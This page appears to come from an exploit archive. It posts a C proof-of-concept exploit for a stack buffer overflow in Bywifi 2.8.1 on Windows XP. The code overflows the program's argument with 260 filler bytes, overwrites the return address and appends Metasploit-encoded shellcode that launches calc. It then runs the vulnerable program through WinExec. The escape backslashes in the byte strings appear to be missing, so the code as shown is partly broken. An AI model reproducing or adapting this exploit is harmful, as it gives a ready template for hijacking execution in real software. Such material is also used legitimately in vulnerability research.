Home / os / win7

Bywifi 2.8.1 Stack Buffer Overflow

Posted on 04 January 2011

# Exploit Title: [bywifi 2.8.1 stack  buffer overflow]
# Author: [Anonymous]
# Software Link: [bywifi.com]
# Version: [2.8.1]
# Tested on: [windows xp Professional French  ]
# CVE : [N/a]

#include <windows.h>
#include <string.h>
#include <stdio.h>
int main()
{
//file name
char exploit[700]="bywifi.exe ";
//ret addr
char ret[] = "x5Dx38x82x7C";
//junk data
char overflow[260];
for(int i=0;i<260;i++){
overflow[i]=0x41;
}
/*
* windows/exec - 144 bytes
* http://www.metasploit.com
* Encoder: x86/shikata_ga_nai
* EXITFUNC=process, CMD=calc
*/
char shellcode[] =
"xbfxdbxf9x8cx6dx31xc9xb1x1exdaxcdxd9x74x24xf4"
"x58x31x78x0fx03x78x0fx83xe8x27x1bx79x91x3fx98"
"x82x6axbfxaaxc6x56x34xd0xcdxdex4bxc6x45x51x53"
"x93x05x4ex62x48xf0x05x50x05x02xf4xa9xd9x9cxa4"
"x4dx19xeaxb3x8cx50x1exbdxccx8exd5x86x84x74x12"
"x8cxc1xfex45x4ax08xeax1cx19x06xa7x6bx42x0ax36"
"x87xf6x2exb3x56xe2xc7x9fx7cxf0x14x40x4cx0exfa"
"x29xcax65xbcxe5x99x3ax4cx8dxeexa6xe1x1ax66xdf"
"x70xe4xf4x1fxe8x45x93x6fx66x61x3cxf8xeex94x48"
"xf6x59x96xaax64x04x04x56x6b";
printf("Exploiting ......
");
strcat(exploit, overflow);
strcat(exploit, ret);
strcat(exploit, shellcode);
WinExec(exploit,0);
printf("Exploitation Finished
");
return 0;
}

 

TOP